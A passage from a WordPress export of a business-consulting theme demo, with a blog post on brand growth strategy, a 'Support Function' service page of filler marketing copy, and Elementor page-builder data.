<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>447</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:09:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:09:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[contactless-payments-time-has-come]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[448]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Support Function</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/support-function/</link>
		<pubDate>Tue, 22 Sep 2020 02:54:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=999</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box5-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box5-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h5>How It Works &amp; How We Do It</h5>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h5>Business Planning &amp; Strategy</h5>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h6>Services</h6>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h6>Contacts</h6>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf.jpg" alt="" loading="lazy">								</a>
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>999</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:54:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:54:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[support-function]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"49a9e54","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"110","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"f99cdb9","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"02efcb6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box5.jpg","id":906},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"2ce419a","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6119ae9","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"61708e5","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"842b3f0","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"6339130","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"306f17a","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"781b565","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fdc54b6","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8335d80","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"8f5e31e","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"e5c28dd","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"080e76c","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Inter","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#FF8F3E","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ea3f620","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"16b4e3e","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3893a38","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"29df260","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"348e8e4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b035bd5","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"93ca462","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"899f255","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"72fb2ed","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"ccc4166","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service.png","id":913},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"31ae611","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"4d5a916","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #ff8f3e;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"bdf1c78","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4a42617","elType":"widget","settings":{"title":"Services","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"d6f9d84","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"1eca910","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"ece40a4","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"e3aefa2","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"18deaa2","elType":"widget","settings":{"text":"Divider","color":"#FF8523","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":19,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"f3267e7","elType":"widget","settings":{"icon_list":[{"text":"marketing 